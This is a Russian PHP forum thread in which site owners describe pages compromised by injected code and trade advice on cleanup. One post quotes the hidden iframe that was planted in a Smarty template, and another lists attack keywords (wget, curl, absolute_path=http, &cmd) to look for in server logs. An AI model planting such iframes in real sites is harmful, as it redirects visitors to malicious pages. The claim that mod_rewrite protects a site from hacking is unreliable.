-
Юбилейный DevConfX пройдет 21-22 июня в Москве. Как всегда — Вы решаете, кто попадет в программу секции Backend — голосуйте за интересные доклады
Какой тип атаки и как с ним бороться
- Автор темы Ezh
- Дата начала
Апокалипсис
тех дир matras.ru
Всмысле появилась? И не повлияла на структуру .php файла?
jonjonson
Охренеть
Ezh, смарти в проекте используется?
Фанат, сталкивался примерно с тем же. В привате особого смысла не вижу. Код был такой...
Вставлен был в темплейт смарти. Предполагали тоже, что утечка пароля ftp.
Фанат, сталкивался примерно с тем же. В привате особого смысла не вижу. Код был такой...
PHP:
<iframe src='http://www.snooztime.com/_vti/index.php' style=width:100;height:100;visibility:none;border:1></iframe>Апокалипсис
тех дир matras.ru
Там была непонятная ссылка которая неск. раз переадресовывалась неизвестно куда
, а если id у неё стереть, попадаешь на порно сайт, поэтому затёр, малоли
Ezh
попробуй сменить пароль, проверяй скрипт, может у тебя идет где запись в файл криво, и хакер просто "подставил" index.php
-~{}~ 24.02.07 05:19:
Ezh
В скрипте больше кроме вышеуказанной строки ничего нет?
, а если id у неё стереть, попадаешь на порно сайт, поэтому затёр, малолиEzh
попробуй сменить пароль, проверяй скрипт, может у тебя идет где запись в файл криво, и хакер просто "подставил" index.php
-~{}~ 24.02.07 05:19:
Ezh
В скрипте больше кроме вышеуказанной строки ничего нет?
Апокалипсис
тех дир matras.ru
Ezh
и что было, расскажи?
и что было, расскажи?
Gorynych
Посетитель PHP-Клуба
Ezh
сталкивался с такими вкраплениями кода на сайтах, под управлением не пропатченных публичных CMS. Часто такие "вкрапления" используются для загрузки javascript-сода и/или показа на сайте баннеров порно- и игровых сайтов
на всякий случай посмотрите логи обращения к серверу, не фигурируют ли в GET запросах фигурируют параметры или значения, содержащие ключевые слова:
_REQUEST, GLOBALS, &cmd, absolute_path=http, perl, lynx, wget, curl, lwp, service=Echo, .pl
если сайт бозируется на публичной CMS - как минимум, обновите версию.
-~{}~ 24.02.07 23:36:
кстати, именно сервак вряд ли бы клали, а вот не посадили ли вам какого-нибудь демона, допускающего консольный вход на сервер - я бы проверил (посмотрите список запущенных процессов и прежде всего обратите внимание на то, нет ли запущенных perl-сценариев)
сталкивался с такими вкраплениями кода на сайтах, под управлением не пропатченных публичных CMS. Часто такие "вкрапления" используются для загрузки javascript-сода и/или показа на сайте баннеров порно- и игровых сайтов
на всякий случай посмотрите логи обращения к серверу, не фигурируют ли в GET запросах фигурируют параметры или значения, содержащие ключевые слова:
_REQUEST, GLOBALS, &cmd, absolute_path=http, perl, lynx, wget, curl, lwp, service=Echo, .pl
если сайт бозируется на публичной CMS - как минимум, обновите версию.
-~{}~ 24.02.07 23:36:
кстати, именно сервак вряд ли бы клали, а вот не посадили ли вам какого-нибудь демона, допускающего консольный вход на сервер - я бы проверил (посмотрите список запущенных процессов и прежде всего обратите внимание на то, нет ли запущенных perl-сценариев)
Ezh
Новичок
Привет, всем извините, что заставил всех ждать.
Первое, что сделали сменили атрибуты файлов, второе на всякий случай сменили пароли доступа через ftp, сайт был без cms. А вот проверку в одной из форм просто пропустили. А демонов пусть хостинг провайдер ловит
-~{}~ 10.03.07 22:10:
Сейчас пишу сайт с использовнием модуля mod_rewrite, вроде как супер спасение от взлома и url чистые получаются
Первое, что сделали сменили атрибуты файлов, второе на всякий случай сменили пароли доступа через ftp, сайт был без cms. А вот проверку в одной из форм просто пропустили. А демонов пусть хостинг провайдер ловит
-~{}~ 10.03.07 22:10:
Сейчас пишу сайт с использовнием модуля mod_rewrite, вроде как супер спасение от взлома и url чистые получаются
зверек
Новичок
Похожая фигня.
К php-файлам прикручивается ява-скрипт, который открывает всякую порнушку.
Как только обнаружили, первым делом проделали все, что рекомендуется в частности на этом форуме в похожих темах: избавились от totalcommander, сменили ftp пароль. Ситуация не изменилась. Вообще перестали хранить пароль на компе. Не помогло
Скрипт пишется в основном в footer.php, иногда в header.php Один раз в index.php В этих файлах нет никаких форм, вообще никакого интерактива, чисто запросы к бд и выводы. К тому же используется mod_rewrite (выше кто-то сказал, что это само по себе защищает сайт..не знаю так ли это, просто перечисляю всю инфу для полноты)
Вот что делать??? Дыра какая-то? А как ее искать?
Хелп, плиз!!!
К php-файлам прикручивается ява-скрипт, который открывает всякую порнушку.
Как только обнаружили, первым делом проделали все, что рекомендуется в частности на этом форуме в похожих темах: избавились от totalcommander, сменили ftp пароль. Ситуация не изменилась. Вообще перестали хранить пароль на компе. Не помогло
Скрипт пишется в основном в footer.php, иногда в header.php Один раз в index.php В этих файлах нет никаких форм, вообще никакого интерактива, чисто запросы к бд и выводы. К тому же используется mod_rewrite (выше кто-то сказал, что это само по себе защищает сайт..не знаю так ли это, просто перечисляю всю инфу для полноты)
Вот что делать??? Дыра какая-то? А как ее искать?
Хелп, плиз!!!
зверек
Новичок
php как модуль апача установлен... Или Вы что-то другое имеете в виду?
-~{}~ 29.09.08 16:38:
Да, еще пытались выставлять атрибуты этим файлам (куда скрипт прописывается) "только чтение". Но это не помогает. Все равно каким-то образом осуществляется взлом, атрибуты при этом меняются.
